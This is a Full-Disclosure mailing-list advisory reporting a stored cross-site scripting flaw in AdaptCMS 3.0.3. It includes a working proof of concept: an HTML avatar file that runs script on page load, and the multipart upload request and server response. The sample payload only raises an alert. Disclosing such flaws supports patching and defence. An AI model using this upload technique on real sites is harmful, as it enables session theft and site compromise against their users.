lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAF2Wu1a=djO6=snv477RqrEUzMmPiFWx4fFe7QrmyzXHzDpUww@mail.gmail.com> Date: Sun, 1 Jun 2025 16:11:43 +0100 From: Andrey Stoykov <mwebsec@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Stored XSS via File Upload - adaptcmsv3.0.3 # Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit "Profile" > "Edit Your Profile" > "Avatar" 2. Click on "Choose File" and upload the following file html-xss.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Alert Box Example</title> <script> // This function will be called when the page loads function showAlert() { alert("Hello! This is an alert box."); } </script> </head> <body onload="showAlert()"> <h1>Welcome to the Alert Box Example</h1> <p>This page will show an alert box when loaded.</p> </body> </html> // HTTP POST request uploading the XSS file POST /adaptcms/users/edit HTTP/1.1 Host: 192.168.58.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 [...] [...] ------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4 Content-Disposition: form-data; name="data[User][settings][avatar]"; filename="html-xss.html" Content-Type: text/html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Alert Box Example</title> <script> // This function will be called when the page loads function showAlert() { alert("Hello! This is an alert box."); } </script> </head> <body onload="showAlert()"> <h1>Welcome to the Alert Box Example</h1> <p>This page will show an alert box when loaded.</p> </body> </html> ------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4 Content-Disposition: form-data; name="data[_Token][fields]" // HTTP Response HTTP/1.1 200 OK Date: Fri, 30 May 2025 20:15:54 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 Content-Length: 15400 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 [...] <img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail col-lg-2" alt="" /> <input type="hidden" name="data[User][settings][old_avatar]" value="1_html-xss.html" id="UserSettingsOldAvatar"/> <div class="clearfix"></div> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists